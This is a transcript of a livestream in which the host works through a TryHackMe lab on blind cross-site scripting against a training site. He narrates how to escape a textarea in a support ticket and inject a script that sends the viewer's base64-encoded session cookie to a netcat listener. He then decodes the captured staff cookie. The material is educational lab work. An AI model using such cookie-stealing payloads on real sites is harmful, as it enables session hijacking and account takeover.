Hello, everyone. Welcome back to another great day, another great stream. Welcome back to another great day, another great stream. Okey-doke. I just want to make sure you guys can hear me because I was having some issues regarding like a plugin I added to my OBS. Cool. Now you guys can hear me. Let's start with our alter ego. This is again Halloween 2 theme song. You guys can hear me, see me. Give me a thumbs up if you guys can hear me. I have both the chats here. Hello. This is working. Beautiful. Let me just go here. See. Okay. Things seems to be working fine. Kido. Sweet. Hey Panda, how you doing? Goody good. Thank you for asking. Okay, that was Halloween 2 theme music. You know, this is our alter ego. Came from the legendary Kobe Bryant. He mentioned that in his chat, in his interview once, and that like got me going. So I always hear this to get my brain into the cybersecurity mindset of a hacker, of a basically like somebody who can kill the protocols, the rules. So it's just that maniac mindset, if you will, right? But now, as I was saying, right, in today's session, we are going to do something very interesting because first we will be doing our task 8, which was the practical example of cross-site scripting. But also, I will start with our command injection. The reason I left this for today because it might take some time and we will be doing some learning with cross-site. And as I mentioned, right, even in the task 1, it is mentioned like cross-site has given a lot of people a lot of good bounties when they did some let's say attacking the Instagram, Facebook, Shopify, Steam chat. Like this one was 7,500. Recently, there is Ben who is known as Namasek. He made I think 50 grand with some of his friends in a bounty, right? So hopefully you guys also learn something awesome from here and able to get some bounties like this. And that's our goal with this year, right? We will be like doing some live bug bounty hopefully. Let's see how things go and let's get started here. So the practical example, blind XSS. For the last task, we'll go over, making sure you guys can see me, right? This hopefully is good, right? For the last task, we'll go over a blind XSS vulnerability. Ensure you terminate the previous machine and click on the green start button on the right to load Acme IT support machine or website. So I believe we will need our Kali today. So I will just start my Kali as well. And as you know, I gave it like a lot more resources than before. So this will be fun, much easier to do. And because I have given it a lot more resource, if there is any computational or any networking thing we need to do, it'll be way faster, right? In the next one with the command injection, network scanning, and all those stuff. So let's see. Graphics error happened. So quick, easy thing to do is reset the machine. So till this is getting done, yeah. Here, yeah. Let's go. It should work this time easily. There we go. Our Kali is loaded. So now we can just go here. Don't have to worry about this. Here, Kali. Here we go. You guys can hear me, right? Give me a thumbs up if you guys can hear me properly. Right? Sweet. So for the last task, we are going over this. Ensure you terminate the previous machine, right? You'll need to use the attack box using the blue button on the top of the page if you want to use that. Once loaded, open the link below inside the attack box Firefox browser to view target's website. This is the website, so we can just go here. You guys need your VPN, right? Like, hope you guys have seen the previous ones. In that I showed you how to get the VPN. So let's go to our desktop, sudo open VPN. Oh, now we are connected to the TryHackMe's VPN. Now we are able to access their websites and stuff. So let's just keep this and open Firefox. Let's go over here. Acme IT support, right? Now let's see what TryHackMe wants us to do. Let me just take a look at the chat. Cool. Click on the customers tab on the top navigation bar and click sign up here link to create an account. Once your account gets set up, click the support tickets tab, which is the feature you will investigate for weaknesses. So basically customer tab, sign up here, and support tickets tab. So we have to first create our account here too. Customers, sign up here. So let's say we'll go with hacker at thm.com. Password hacker. Let's see. Don't save. We can see our tickets here, right? Cool. Create ticket. This is our stuff. So let's see what next is. Try creating a support ticket by clicking the green create button. Enter the subject and content of using the word test, and then click the blue create test button. You'll now notice a new ticket in the list with an ID number, which you can click to take you to your newly created ticket. Like task 3, you will investigate how previously entered text gets reflected on page. Upon reviewing the page source, you can see the text gets placed inside the text area tag. So we see here, right? If we do a test, we'll see that. So let's see. Test subject, test content, and create button. Let's see. Now if we click button 8, we'll see this, and this is in the text area. See, okay, in the support ticket button, like this, right? We have this. Now let's go back and create another ticket. Let's see if we can escape the text area tag by entering the following payload. So we'll enter this payload here. Again, opening the ticket, viewing the page, so you successfully escaped the text area. Let's now expand on this payload to see if you can run JavaScript and confirm that the ticket creation is vulnerable to cross-site scripting attack. Try another new ticket with the following payload with the script tag. So it shouldn't be that hard, right? Let's see. Go back to the dashboard, support tickets, create ticket, subject, test. So this one works, we know, right? The sub one, we are able to escape, right? If we do another ticket, which has 2, even though the ticket number is 3, but you know, things start from 0 in computer science, right? Script, alert, THM. So we are able to see that it worked. Great. So what will be our task next? Now, when you view the ticket, you should get an alert box with the string THM. You are going to expand the payload even further and increase the vulnerability's impact. Because this feature is creating a support ticket, we can reasonably confident that a staff member will also view this ticket, which would get to execute JavaScript, which could get to execute. So okay, some helpful information to extract from another user would be their cookies, which we would use to elevate our privileges by hijacking their login session. So basically, what we are trying to say here is that when somebody is like trying to go over these, right, we are actually also going to like make a script so that on our server we can get their script with their code. So this is how they are going to do everything. So I don't want to see this, right? I don't want to see majority of it, but you know, at CAT we have done it 1,000 times already. So we have to basically create using the attack wall. Let's set up a listening on the netcat and blah blah blah. So let's do it this way. We set up our netcat so that we can listen if any things are made, and we go back where we can use the cookies hijacking code is executed and sent back to us basically. So let's do that. We have our netcat here. Let's do ifconfig r is 10 to 15, right? NLVP. Okay, so we are listening on this port. Now our job is to find a way how we can make something listen or like get that cookie data. So it's pretty easy. Basically, we will do a fetch command with fetch information like this. Here I will show you on the console. Oh, my bad, clicked that accidentally. We'll do basically a fetch function here. Let's do this way. Why is going here again and again? Fetch function basically, which will make an API call. Let's say if I do https://google.com, we will get Google stuff. Uncaught syntax error missing. Oh. Let's see if this promise, basically promise means that it was able to at least like start the fetching thing, which we wanted. So what we'll do is, that's why I have to do control shift thing. Okay, so that's all we have to do then. Let's go back to our create ticket. Create a ticket. 3/text area, getting out of the text area, and I can't type. Now we'll do our script basically. With our script we have this, then we'll do a fetch URL of our IP address first, right? What was the URL? I think it was 10.0.2.15 and slash query basically document dot, let's see how it works, like document dot cookie, right? We will get the cookie if we do document dot cookie. Value equals document dot cookie. If we do cookie here, this gets us the thing. What if we do cookie with the, it's not a function, it's just a value. So let's do this and then close our stuff, script. Let's see how this will perform. So now if let's say somebody opens our stuff, we should get their cookie. Hopefully. Let's see. Network error, I'm attempting to fetch this. Did we get anything? No. Let's see. They want you to just do L and P, then let's see that. Oh, I have to mention the port number too. My bad. So I'll clear this. And we have the port number. I just want to copy that whole thing if I could, but never mind. Create here 3. I wish it came automatically, that would be so much easier. But let's find script, right? Our fetch http 10.0.2.15 port 9001 value equals with the query string, let's say value equals document dot cookie. Let's see how this will work with the close this here script. Let me copy this for future. Now let's see how the other one is working. If I go here, did anything happen? No, nothing happened. Let's see, text area here, script, this. So let's see what we are missing here. Equivalent to NLVP. Okay, so using this netcat, if you listen to, so our basic job, right, the thing I missed is basically it says to do this, our payload will need to extract user's cookie and exfiltrate it to another web server of our choice. Firstly, we'll need to set up the listening, right? So first we are setting up our server using our local machine. We issue this command. The L indicates that we want to use netcat in listening mode, and P option specifies the port number. To avoid resolution of hostname via DNS, we can use -n. However, to discover any errors running netcat and verbose mode by adding -v option is recommended. So basically they did what we were doing before. I didn't read it properly. My choice is NLVP. That's my here, right? You guys can still hear me, right? Cool. So we are adding in this chat box, right? How we are doing is we are trying to change and make sure somebody puts some kind of info. Sorry, I'm just looking at the chat just in case if somebody messages me, right? But we have this text area, but again, we didn't see anything. What we can do is look at the other one, 220 and 149. First, let's create a support ticket here. Let's give it as 4, right? Do this, but also we're going to create another one in which we are going to change the script IP address, which will be again 2.20, the other IP address we saw, because I get confused why this one is this. I think it's the 220 149 maybe. I have to read those lines. Come on. So I have this. I'll copy this here, create. Now let's see if anything happens here. No, let's open our own ticket to see. Inspect. We might have got this error. So network error when attempting to fetch the resource. This. What was the network error? Let's see. Ticket 13. Subject is this. Get. These two are not working. Mixed block. Why this error is there? Okay, so let's remove one thing from here, the question mark. 5. Okay, let's see. Oh, it might have worked. Let's see. Maybe not. What was the header? Sent. Maybe I have to find a way that I put it in a variable, then I can get it. Maybe, let's see. It's all about hit and trial, right? Sometimes it's about hit and trial, but we are trying to reverse engineer it. Should be able to get something faster. So let's do this way. Let's make some clean coding here, where we first make a fetch, right? End this one. And in this case, first let's do this. Let there be let variable equal to document.cookie. Now that we have this variable, we'll do the semicolon to exit out of that, and then we'll do here is just variable and variable. Let's see. Another thing we can do just to test, let's see. Is value equals variable. Let's do it this way. Oh. We have to use I think like this, so that because we are getting the value of a variable inside here, we're not just typing variable, and we have to change these to the tick ones. This, if you see, this is a semicolon, just a single quote. We are changing it to the one just above the tabs one, which is just with the tilde. So whereas then we can replace the variable's value easily. Let's see which one of them works. Create ticket. Without subject, it created the ticket. Let's see. Okay, we see the session. This is our session value, right? We see our session value getting created. And let's see what was the response here. Nothing here. So we might be making some kind of mistake. So let's see. Fetch mixed block transferred. Let's say maybe because we are using the one here. So let's see if value, if we do it like this. Let's see. Create ticket. Oh, hey. Thank you so much for following. I really appreciate it. Hopefully the music this time is less, because last time the music was so loud. I had a heart attack almost. I wanted to create a clip of it, but I was just too embarrassed to show that. Okay, so see, we have the session cookie. Let's see if our server is not receiving anything. That's my concern, because our server, when this fetch call is made, should do something. So let's do this way. Whatever this fetch is, let me make a fetch variable call here, or if just do this. So now if you read this, right, this says allow pasting. Let me give you a really interesting way. If let's say when you go to a website, right, and it says, oh, this might be like a hacker trying to get your information, blah, blah, blah. You might be just testing your stuff. Just like here, it says allow pasting. You can type this exact thing and Google will let you go to that website without clicking anything. This is unsafe. Without any spaces, anything. If you type, let's say if this was like giving me that error, right? I go, this is unsafe, and press enter, and it will work like a charm. So just like that, there is something called allow pasting. I can paste anything. If I try to do some coding, it is very not considered good, but here I want to do it for the testing reasons. So I'm going here. First I will do the variable let variable, and your whole Google is one of the Google Chrome is one of the biggest application software you will ever see, because it has like a own operating system in itself. Same with Firefox or Edge, they use something called V8, and so basically kind of a web operating system. You can think it's JavaScript engine, and that does such a lot of things. So this is what we are playing with, the JavaScript engine. I want to give you guys this info because I wish somebody else told me this when I was starting. So I'm just trying to be the mentor I never got. Hopefully you guys like it, right? And I'm able to do something for you guys. Variable this. Oh, my bad. Let me copy this. Control X. Document dot cookie. So this is my cookie value. If you get this value, you can anytime get declaration to let variable. Okay, how about we do let has declaration still will get this error. Yeah, okay. Debugger eval code. Why there is this error? Oh, let test equals 1. This one works because now test value is 1 all the time. So, but for this, I need to think of a different way. Okay, evaluate the value cookie this. Let's see. Get let's see why there is this error. Unconstituted declaration of let variable. No. Let's see. Let declaration cannot be redeclared by any other declaration. Okay, so should just do let value needed is equal to document dot cookie. So value I have is this. Now this is my value, because I was doing let again and again, so that didn't work. But now I can just copy this thing. Let's see if this will work. This function here, we have the variable being put out. So let's see what this will do. State rejected reason type error. Let's see here, we can see the fetch was made, blah blah blah. What if I do just this? Type error, network error when attempting to fetch resource. Okay, and nothing is shown here as well. Any idea by any of you guys? Maybe type error, invalid URL. Give me the idea of this in more detail. Block loading mixed active content. Okay, what does this error means? Why am I suddenly getting block loading active content issue in Firefox? Blocked blah blah blah. Mixed active content is now blocked on Firefox 28. What is mixed content? When a user visits a page served over HTTP, their connection is open to eavesdropping. Basically, some hacker can, if they are listening to the communication, right? If they have access to your Wi-Fi, they can look. That's why it said never visit or any personal site where you are doing login over any cafe or open Wi-Fi points, because that's what men in the middle attack or eavesdropping can do. When a user visits a page over the HTTPS, their connection with the web server is authenticated and encrypted with SSL. However, if an HTTP page includes HTTP content, the HTTP portion can be read or modified by attacker through the main blah blah blah. Okay. The resolution in this case was to simply ensure jQuery includes were follows as follows. So here we have jQuery and here we have our script. Okay, so how about I ask Perplexity create, oh no, I don't want it to log in, create a fetch query so I don't get blog miscontent, right? I am currently trying to run, and let's go here, get our stuff, fetch this. Okay, let's see what this says now. To avoid blog content HTTP instead, if your server doesn't support HTTP, you have two options. Enable HTTPS on your server. If this is for development purpose, you can use a relative URL. Okay. Running on. Remember HTTPs. Yes, I cannot HTTPS right now. It is for development. How to bypass that? For the URL I mentioned above. Okay, for development here, if we do this response JSON handle, the approach uses protocol relative URL, which will use the same protocol HTTP as the page it's running. Okay, that your API is served from the same origin as your application during development. No, my page and server are on different machines. Okay, if you don't get it, let's just do course origin. Okay, course is there. Oh, we have course proxy. Okay, this way you can set up course proxy server that will make request on your behalf. This can be done with course anywhere. Okay, disable web security. Okay, we don't want to do that. So we have one way is to allow course origin, like bypass course origin. Let's see. Okay, now we have this information because of the origin. We are having the issue, but let's see. Okay, there is this BTOA. What is BTOA? JavaScript method. Okay, base 64. Oh, the reason we are not getting maybe because it's base 64 encoded. So how things are stored in your browser, everything is base 64 encoded, and that's probably why we are having this issue. Let me see. No, one sec. So no message. Hey, again, thank you so much, Newgen29. Thank you so much for follow, mate. Really appreciate it. So one thing we can do here is, here we have cookie. I can do BTOA. That's the one, right? I have it BTOA. So let's see what it will do here though. So we have document.cookie. This will do this. What about if we do BTOA document.cookie? Okay, this basic base 64 encoded, and we know how to decode it. Very simple. So that is the reason. Okay, that's a good learning. That's a good learning here for me. So I can just copy this again, create the next support ticket, and let's see how this will work. 11, or yeah, I think let's just do 11. Give us something, give us something, give us something. We have 11 subject. Let's see if something was received. Nothing was received here still. Network error while attempted to fetch the resource. Cookie this. Huh, we still didn't get it. Wait. There was still a network error trying to get this. What am I missing? Maybe this here. And let's see if this, I don't want to take any help from those, but if we have to, then we'll do. Was there an error here? In promise type error. Still nothing. So let's see what they have to say for this. So now when our server was there, now that you have set up the method for receiving exfiltrated information, let's build the payload. We did our payload, right? We had our port number. So that was good for us because we got our cookie, we got our BTAO and stuff with the fetch. So that was a good learning we had. We are correct. Let's break down the payload. So text area gets us out of it. Script, start the script, fetch this, we have this. BTO base 64 encodes the victim's cookie. This gets us the cookie. Now create another ticket using above payload. Swap out the variable, right, to make sure specific port number as well as the netcat listener is there. Now wait for a minute and you'll see the request come through victims. So let's see, maybe because we are doing this not like in the session, in the query itself, that might be a reason, a pretty stupid reason. I don't like that, but might be a reason. So let's see that. If that happens, that is a good learning for us too. So sometimes direct is better. Cleaning the code doesn't work well in this world. So plus okay, cookie equals as this. Okay, and that's how it needed, right? Give me a thumbs up if you guys remember, right? Teaching moment. Yeah, it is a teaching moment. It is indeed one, boss. Teaching and learning both happening at the same time. I like it. And let's take this out of the equation. But hope you are learning something. That's my really a big wish from my side, is hope you guys are learning that something, right? Let's give it a minute, they said. I want to see, right? Let's give it a minute. Hopefully I'm available here. One view, that's not bad. Better than last time. Let's see, back to our TryHackMe. So let's see why there is still block mixed content. How about if we have they been doing HTTPS or just HTTP? That's another thing. Let's check. HTTP URL and our port number. Yes, we did that. Cookie. Yes, we did that, and we did this whole thing. Interesting. If we still don't get it, then we have to see something into this. Still don't have it. Let's do one thing then. It's all figuring out, I guess, at this point, because we all are learning, right? Learn more than when I started with before watching your videos. Thank you, boss. Thank you so much, Panda. Really appreciate that. And I hope this learning continues, right? We all are like learning from each other. That's how we want it. And let's see just one thing I want to see. is HTTP port number cookie question mark. Okay, there is no URL they are doing, so they are doing question mark here. That might be a problem. Why? Because they are not, I was not providing the proper URL. Okay, this time it hopefully worked. No, same thing. Let's see if still this happened here. Something happens here. At least we know the session cookies are getting there, stuffs are getting there. Let's see. Why nothing? This is one of those moments, right, when you are like trying to build something, you are looking at another Indian dude making something on your computer, and then his Python code, JavaScript code is working, not yours. Is one of those moments. That's Indian dudes also struggle on coding, so trust me, this is how it works. Let's do one more thing here. Script, let's end this tag and go here. Let's start this tag. Let's see if this separating the tags will work. Let me copy this for future. Okay. And it is 9001 I'm doing, so I'm doing both the, okay, I hope one thing that doesn't happen. 220.149, that's the one I'm doing, right? 220.149, yes. And the other one is 215, 10.0215, port 9001. Then why it's not working for me? I'm listening on this port. Any idea by anyone why it's not working? Let's see with sudo. Let's see if this one will do anything. Bro, I've created so many support tickets here. 21, man. Holy. Script fetch. And they are using fetch too, right? It's everything we are doing same here. Text area we close, script we do fetch, URL port number cookie, BTOA to base 64 document.cookie. Yes, we are doing everything of that. Then why we are not getting that? Even like this should make a call to us. This is crazy. Why this is not working for us? Let's see. We have tried everything. Like we did netcat. We did our port number, listening to any 99001 request. Okay. Yes, you are listening to the request, but what is going on here? Did this work? This made any request to you? Okay, this made the request when we went like that. Wait, so if we do, that's still working. So that was our right one. At least we now know the port number. We know the port number. We know this. You can encounter issues with receiving the request with your own VM and the VPN. It's recommended to use the, oh my god, we have to use the attack box because we can face it. Why they didn't mention in the start of that thing? So we were doing everything right. It's just their system is flawed. Oh boy. Hey, we learned a lot. We are just too smart. We just outsmarted ourselves. But that's fine. That's how we learn, right? Next time I know, start the attack box in these cases. Don't even worry about these. So we will be able to get our session cookie in just a minute here. Yeah, and at least we know one thing. The number should be 221.49, I guess. Right? 221.49. That's our number should be. So at least we know we learned that part. Okay, close this guy. Okay, YouTube chat is very dry. At least you guys are doing well on here. Thank you so much for chat, Spanda. Feel free to ask me any questions regarding cybersecurity too if you have any till then. I'm very much happy to answer anything you guys have. Don't ask me how to hack your boyfriend's or girlfriend's Instagram account, please. I beg, do not ask that. Let's see. Connecting. Yeah, you are definitely connecting, mate. And now once we have the base 64, right, we can just go to base 64 decoder and then we can decode that. What is the value of staff session cookie? And you know what we'll do? We will go one step further. Once we have the staff's cookie, we are going to log in as the staff and see what we can see. But here for now, let's go here. NC LVP 9001. We are listening to this port. Let's go to our browser. What was that? 1010 something. 1010 181 and 95. .10 dot 95. Let's see. We are at Acme, contact, support, customer, blah blah blah. We have our customer login, so let's go bigger. Hacker, not now. Your account, support ticket. So let's do this. This one, I know this one is working, so just have to do this. Here, BTAO. Let's see if this one is, when we do just this, one thing we can test is, if I just did this, right, and even with the variable, it should still work. I want to see this, and then another fetch request. And I'll copy the whole thing here. Super slow machine. Great job. That's why I like my Kali. I'm pretty sentimental about my work, about my computers and stuff. So here we have, or let's do it like this. Let variable equal document dot cookie. Let this be variable. Let's see if those two both will work or just one, right? That will be a good learning for us. Let's open our inspect console. Let's make it bigger. Let's clear this. Okay, moment of truth. Okay, I think cookie admin false session this. Okay, which one of them was blocked? Let's see. This one was basically blocked, but this one, the base 64 encoded one, worked, and we should see this in our terminal here. No, here we'll see it in our terminal. Let's go back here. Oh, this opens another terminal here. In a minute we should see it as they mentioned. Let's see if that gets us anything. But basically the base 64 one will be working, not the other variable one, because it's in plain text. So let's go. And oh, I see it. Nugent's Nugent 2's name is there on the top left because the stuff I created with the latest follower. So that's cool. I like it. I'm making progress. So let's see, this one worked or no? But hey, this should still work, right? This, I should be able to see this. I didn't get this value. Network error headers for this. So if I go this one, no. Okay, so maybe what we can do is the other one. We can create another ticket and just change the values. I don't know how to use this one, how to change things in this one faster. But let's say we create another support ticket, create new one. Copy from the Kali here. Oh, everything got rewritten. Shit. That's fine. Shouldn't have relied on this anyways too much. Text area script fetch here http .10.0.2.15 cookie equals, close this, plus btoa document dot cookie script. Okay, made this request. Let's see. This one worked flawlessly. Let's see our netcat here. Nope, nothing yet. Header cookie, let's see. So if I make request to this, but instead of this I made request to 0.2.15 and close all this. Will this do anything? If this doesn't do anything as well, what we can try to do is 2.20.149. Okay, no. So, oh, the IP address are different for these. Oh my god. My brain not working. My brain not braining. I'm so sorry, guys. What is the command for new tab? Shift Control D. Okay. And 10, 10, 19, 85. So 10, 10, 119, 85. Let's see if this one will do the job. If we go to netcat, we see it here. So that's was our issue. So let's do that quickly. Did our netcat here is already stopped? Never mind. I was thinking if our netcat here got the response, that would be nice. That'll be fire. Text area. Now we have script. Fetch http 10.10.119.25 or sorry 85. And now I will also add bt, the base 64 encoded document dot cookie, but I know what mistake I'm making here. Let's see. Cookie, let him cook, let him cook, let him cook. I am cooking cookie. I'm cooking cookie. Huh. That is interesting, wild thing to say. Nonsense thing to say, honestly. But that's fine. So I see it. 25 was a fetch call made here. Ten 985 9000, right? And this cookie. Why this didn't work? What is going on? This worked. Okay. Keep listening, keep listening. Somebody should be clicking this create ticket anytime soon, boss. And I can see my script here. I don't know why I was going here and there trying to type everything. I forgot that I can see my script here. If you see my script here, 10 10 19 185. Let me make it better so you guys can see. So this is my script, right? Here, one sec. Cool. 10 10 19 185 cookie btao, right? This is what we wanted. Edit as html1, control C. This should work. Should be seeing something coming up here anytime. Let's get out of the text area. HTTP this 10 10. Yeah, that's correct. Okay, now let's see. Let's wait. Till then, I'll just see if there is any questions. If anybody has, feel free to ask me. I'm your lad. I'm your guy. I'm your buddy. Till then, let's see if this one worked. And what TryHackMe has to say about it. We can base and decode this, right, up to a minute. So up to a minute we should, let's see. Ten 119 85. Do you see any mistakes I'm making if this doesn't pop up? Oh wait, we got it. We got it. Was it this that we did that? Oh no, never mind, we didn't got we didn't got it. I just accidentally scrolled up. I didn't got it yet. Oh my god, I got so excited about it, man. Shit. I'm an idiot. I'm an idiot. Let's see if we have to wait. Come on, mate. Come on, come on. Oh, we got some more views here. That's cool. Thank you. I'm happy. Current bitrate 2700 kilobytes per second. We recommend that you use a stream bitrate of 6800. Okay. Need to go back and see how it feels on. I know about Twitch. Twitch is the king when it comes to streaming, right? That's their main job, and YouTube is focusing more on the shorts. Like, I'll tell you this interesting thing. If you ever go and want to see the YouTube's mentality, like they're focusing so much on shorts nowadays. When you open your YouTube app, there is no option for live streaming. Straight up, there is no like, oh, what is live going on. Either there are videos, but it always have a default of opening to shorts, because they know how shorts are like psychologically, like you are spending more time on the app because of the shorts, and that's how they are playing the game now with the TikTok being banned and stuff. So that's how, like, I will show you like how big brain stuff they are doing there. Let's see if I go to this ticket, does anything happens? Cross origin, same origin disallows. Reason cross origin header access control allow origin missing. So just because like a course you can do is like basically with the HTTPS, you can bypass this, or you can allow it in your header while making your website or a front end something. You can just access control allow origin. You can have that in your header, which let me show you in the network. If any call is made like this, here, this one, right, I can change the header value, strict origin when cross origin. I can change this value, then it will work, but this is the default, and I just want the admin's one, not mine. So let's see if I can get something out of him. Is this even working right? I'm doubting myself now. Open link in new tab. Error response, method not allowed. Okay, why it's not allowed? HTTP// this cookie huh 405. That's interesting. Let me change the cookies here and see. No, let's not do that. 405. Let's do it this way. Let's listen to 100. Let's go to the support ticket, create another ticket. Text area. What am I doing wrong is something like I don't know yet. Let's see if we can do some more learning here. Fetch HTTP. With the HTTP we have is 10.10.119.85 cookie cook. Let's cook. I could have typed something different with replacing one of the O's, but we won't do it. I don't want to get banned right now. I'm not big enough that even if I get banned, they will want me back, right? So can't do that right now. Document.cookie here, and I want to change this to 100. Oh, we got something. On 100 we got this session cookie. Okay, I think that's our answer. So let's base 64 decode. I can do here, right? Base not found. Is there how to decode? How to decode using terminal? Reject all. So let's see. Reddit is the GOAT or Stack Overflow. One of those. Both are really good. Necessary cookies only. Echo this base 64 decode. Okay, there's base 64 decode, right? So echo this, pipe this. Pipe means like whatever the value of the echo, which is basically I'm just restating the string, that will be sent to the next command which I'm putting, which is base 64 decode. So staff session value is this. Copy. Let's see. Boom. Give me that. Cool. Finally did it. We are at our streak 37. Points earned 80. We were able to complete our task. Let me take a screenshot of this. Sweet. Yeah, we did it. Finally. Yeah. Thanks so much for those emojis. I love emojis. I was thinking, like, so I'll show you something. I have Photoshop on my system. I can't open it for some reasons. I can't say that reason. But yeah, I've been trying to create a better photo. So once you guys see my streams anywhere, right, you'll see a better photo coming tomorrow. So I'm just improving every day. I have my Instagram I'm working towards. This is not the right Instagram, I thought, but I have my Twitter, everywhere else, and I'm changing my name to Censored Hacker because then it will be consistent everywhere, right? If you guys see my TryHackMe, no, I will do that later. Next is command injection, right? Go to the next room, we can see. But if you see even my TryHackMe name, that's Censored Hacker. And I was learning about how to do better marketing, and it said when people have the same name, same like at, it's way easier to find and it's way easier, like it's much better to get followers because you are not, because the name is same, right? Like for example, CR7, you know who I'm talking about, Cristiano Ronaldo, and because he has that same thing, whichever platform he goes on, it is like it creates that trust faster compared if I have like my original name Gaurav Satija one place, I am Gaurav Satija other place, Censored Hacker one, OXG side. So that's what I've been trying to do. If you see, this is Censored Hacker. It was a different name before, but this is Censored Hacker. And I recently got a like from this guy. If you don't know, Jack Resider. He do Darknet Diaries, right? Best hacking stories online. And even on my LinkedIn, my Twitter, everywhere, I want that to be same. So if you ever want to do it, like that's just my tip, have the same name everywhere. I wanted to have a different name, but one of the places is already taken, which is fine. So yeah, just my tip from my side, right? I'm your Censored Hacker. Today we did our cross-site scripting. I wanted to get some command injection too, but that's fine because we have 2 more days still before the weekend, because Friday I don't do it. Friday I do some learning towards marketing and bringing on better like streaming experience for you guys. Like this week I learned how to put the mic in front of my face here near to my chest compared to on the side, because it gives a better volume. It's more consistent. It's just better experience for whoever is listening. That's what I learned, and in all the learnings I was seeing. So that is one, and then you will see things better and better, becoming like putting some commands. Like if you see here, I added this last week too with some learning. if you see Discord, because somebody asked me what is my Discord, you can see my Discord now, right? And you can see I could not change my Discord. That was a problem. But if you see there's uptime, I'm trying to add more. And once I have my points, once I reach the affiliate, which is like 50 users, 50 viewers and like 3 average viewers, I can add some points. With points, you can play slot machines, you can bet with other viewers and like have a better engagement one. So that's what I'm excited about. Hopefully you guys learned something from this stream. Please give a follow. It makes a big difference to me. Like today, it was such a good thing. Nugin into 9, right? He did a follow. So thank you so much for that. And thank you for giving me your time. I really appreciate it. Hope you have a great day. Tomorrow, we will learn about command injection, where we will learn about, this is a web vulnerability again, right? Because we are doing our intro to web hacking. We have discovering the command injection, exploiting it, remediation as a developer, and the practical. So we will be, in my opinion, be able to cover it tomorrow, hopefully, majority of it, or if not all. And then we'll do our practical. Once that is done, I'll do again a poll, whichever you guys want me to do, like practice one. And I will do like capture the flag, whichever room you want me to do. That's what we'll do on Saturday and Sunday. But till then, thank you so much for everyone who joined. Thanks for the follow. Really appreciate it. Hope you have a great day. I'll see you tomorrow. This is your Inside Hacker. Bye-bye. Bye. Bye. Yeah. Thank you so much. Thank you so much for chats too. I really appreciate that. This keeps me going. Try out. Oh yeah, uptime is 1, right? I did that automated one too. I have this one. This is funny. I'll send you some. Let me, before ending the stream, let me send you some funny ones I really like. This is from Pirate Software. He is OG. And there is, because I subscribe to his one, and then there is there is just so many funny ones here. I will be coming up with my own too soon. So stay tuned, I will say. Till then, thank you so much. Try some more emojis, and I will see you tomorrow. Bye-bye. How to stop this? Oh, this. Transition. Yeah, now I have a different dock. So, peace out.